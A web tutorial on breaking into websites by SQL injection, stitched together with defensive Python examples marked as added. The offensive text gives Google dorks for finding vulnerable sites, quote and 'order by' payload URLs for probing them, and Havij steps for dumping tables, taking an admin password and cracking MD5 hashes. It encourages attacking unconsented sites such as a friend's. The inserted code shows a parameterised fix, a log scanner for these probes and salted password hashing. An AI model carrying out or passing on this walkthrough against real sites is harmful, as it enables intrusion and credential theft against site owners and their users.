How to Find a Vulnerable Website?

Google is a hacker's best friend. We can find vulnerable websites using Google search. The search queries used for this are known as Google dorks.

A small list of Google dorks:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:post.php?id=

inurl:article?id=

Download a large list of Google dorks from here

Copy one from the list above, paste it into the Google search box and hit Enter.

You will see a list of websites whose URLs end that way, for example:

http://www.victim.com/index.php?id=2

Go to that link.

Add ' (a single quote) at the end of the URL.
For example:
http://www.victim.com/index.php?id=2'

Now hit Enter.

If the page loads the same as before, then the website is not vulnerable.
If the page shows an error or a blank page, then the website is vulnerable.

Now let's check further. (Explanation: Step 3)

Remove the single quote from the URL.
Then add “order by x” (without the quotes).
Replace the x with 0, 1, 2, … n (until it shows an error page).

For example:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5 (error)

From this you can conclude that the page's query returns 4 columns.
It is also vulnerable.
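Why these two checks behave as described, shown as an added example (not code from the original post): the page's handler is assumed to build its query by concatenating `id` into the SQL text. The `articles` table, its four columns and the function names are constructed for illustration, with SQLite standing in for the site's database; the second handler is the fix, which validates the id and binds it as a parameter.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles "
               "(id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?, ?)",
                   [(1, "Hello", "First post", "alice"),
                    (2, "News", "Second post", "bob")])
    return db

def fetch_vulnerable(db, raw_id):
    """Concatenates the id into the SQL text, so the input is parsed as SQL."""
    try:
        sql = "SELECT * FROM articles WHERE id = " + raw_id
        return ("ok", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # A broken statement surfaces as a database error: the "error page".
        return ("db-error", str(exc))

def fetch_hardened(db, raw_id):
    """Accepts only a short ASCII integer id and binds it as a parameter."""
    # The length cap keeps the value inside SQLite's 64-bit integer range.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return ("rejected", [])
    sql = "SELECT * FROM articles WHERE id = ?"
    return ("ok", db.execute(sql, (int(raw_id),)).fetchall())

# The id values used on this page: normal, stray quote, ORDER BY 4 and 5.
PROBES = ["2", "2'", "2 order by 4", "2 order by 5"]

def statuses(fetch):
    """Run every probe through one handler and collect the outcome labels."""
    db = make_db()
    return [fetch(db, probe)[0] for probe in PROBES]

if __name__ == "__main__":
    for name, fetch in (("vulnerable", fetch_vulnerable),
                        ("hardened", fetch_hardened)):
        print(name, dict(zip(PROBES, statuses(fetch))))
```

The hardened handler answers every malformed id the same way, so the quote and `order by` requests no longer produce a distinguishable error page.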

If the above method is not working, then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5-- (error)

If this is also not working, then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5-- (error)
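On the server side, the request series above leaves a recognisable trail in the access log. As an added example (not part of the original post), this scanner flags numeric parameters whose value continues as SQL and counts how many of those requests were answered with a 5xx status; the log lines, client addresses and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation-range client addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 310
203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /index.php?id=2%20order%20by%204-- HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2024:10:00:11 +0000] "GET /index.php?id=2+and+1%3D2+order+by+5-- HTTP/1.1" 500 310
198.51.100.20 - - [10/Mar/2024:10:01:00 +0000] "GET /article?id=17 HTTP/1.1" 200 4096
198.51.100.20 - - [10/Mar/2024:10:01:30 +0000] "GET /search.php?q=how+to+order+by+mail HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# Rules only fire on values that start as a number and continue as SQL,
# which keeps ordinary text such as a search for "order by mail" out.
RULES = {
    "stray-quote": re.compile(r"^\d+\s*['\"]"),
    "order-by-n": re.compile(r"^\d+\b.*\border\s+by\s+\d+", re.I),
    "boolean-test": re.compile(r"^\d+\s+(?:and|or)\s+\d+\s*=\s*\d+", re.I),
}

def scan(log_text):
    """Map client address -> (sorted rule names hit, flagged requests answered 5xx)."""
    hits = defaultdict(lambda: {"rules": set(), "errors": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qsl decodes %27, %20 and '+' before the rules are applied.
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        matched = {rule for _, value in params
                   for rule, pattern in RULES.items() if pattern.search(value)}
        if matched:
            hits[client]["rules"] |= matched
            hits[client]["errors"] += status.startswith("5")
    return {c: (sorted(h["rules"]), h["errors"]) for c, h in hits.items()}

if __name__ == "__main__":
    for client, (rules, errors) in scan(SAMPLE_LOG).items():
        print(client, rules, "5xx responses:", errors)
```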

Note:
If you want to hack a particular website, like http://www.yourfriendwebsite.com, then go to that website and find a page whose URL ends with one of the Google dork list items.

If you think the explanation given above after Step 3 is tough, then follow this.
Download the free edition of Havij (on the same page, you can see the difference between the free and professional editions). It is a matter of what your target is.

  • Now search Google with the options below to find websites vulnerable to SQL injection to target with Havij:

inurl:index.php?id=
inurl:article.php?id=

Once you choose a website, type ' at the end as shown below and press Enter. If you get an error, then the website is vulnerable to SQL injection.

http://www.hackandsecure/site/content.php?vn=3&id=77'

1. Retrieve DB Information:
Copy and paste the target URL into the ‘Target’ field and click ‘Analyze’.
Once Havij has successfully retrieved the DB name, it will stop, and you can see the database details either in the log window or under the ‘Info’ option. Havij will retrieve the web server type (Apache, IIS or other), the DB type (MySQL, MS SQL or other) and the DB name.
Once this is successful, you can be sure that you are on the right path, i.e. your target is vulnerable to a SQL injection attack.

2. Retrieve Tables:
Now you need to retrieve the tables that contain the user names and passwords used to log in to the website. Choose the DB and click the ‘Get Tables’ option.
Here you go, now all the tables are retrieved from the DB. You can either wait until it retrieves all the tables or you can just stop it when you see any suspected table like the one below. I stopped the processing when Havij found a table that I suspected to be containing user names and passwords for the website.

3. Retrieve Table Columns:
Before you start retrieving the data of a specific table, you need to get the columns. So mark the suspected password table and click ‘Get Columns’.
I am really sorry for marking all website-specific details with a red mark; I must do that to safeguard.

4. Retrieve User Name and Password:
You are at the final stage of hacking. Mark the database, table and columns to be retrieved; you have the option of retrieving only one row. Choose ‘Get Data’ to let Havij give you member access to the site.
I am done now; luckily my target website didn’t store passwords encrypted, and I have their website’s admin password. That’s it!
If the password is encrypted, Havij has an inbuilt MD5 option where you can specify the MD5 hash to be cracked. Havij will look for the hash on several sites in multi-thread mode and display the result.
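The hash lookup described here works because an unsalted MD5 of a given password is the same on every site. As an added example (not from the original post), this is the storage side done with a per-user salt and a slow key-derivation function; the record format, iteration count and function names are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # work factor (assumed value); tune to your hardware

def md5_unsalted(password):
    """The weak scheme: fast, no salt, identical output for identical input."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def hash_password(password):
    """Derive a record 'pbkdf2_sha256$iterations$salt$hash' with a fresh salt."""
    salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                  salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${derived.hex()}"

def verify_password(password, record):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, hash_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
        rounds = int(iterations)
    except ValueError:
        return False  # malformed record: fail closed
    if scheme != "pbkdf2_sha256" or rounds < 1:
        return False
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                  salt, rounds)
    return hmac.compare_digest(derived, expected)

if __name__ == "__main__":
    # Two users with the same (constructed) password.
    print("md5   :", md5_unsalted("password"), md5_unsalted("password"))
    print("pbkdf2:", hash_password("password"))
    print("pbkdf2:", hash_password("password"))
```

With the salted records, two accounts sharing a password no longer share a stored value, so a hash found in one place says nothing about another.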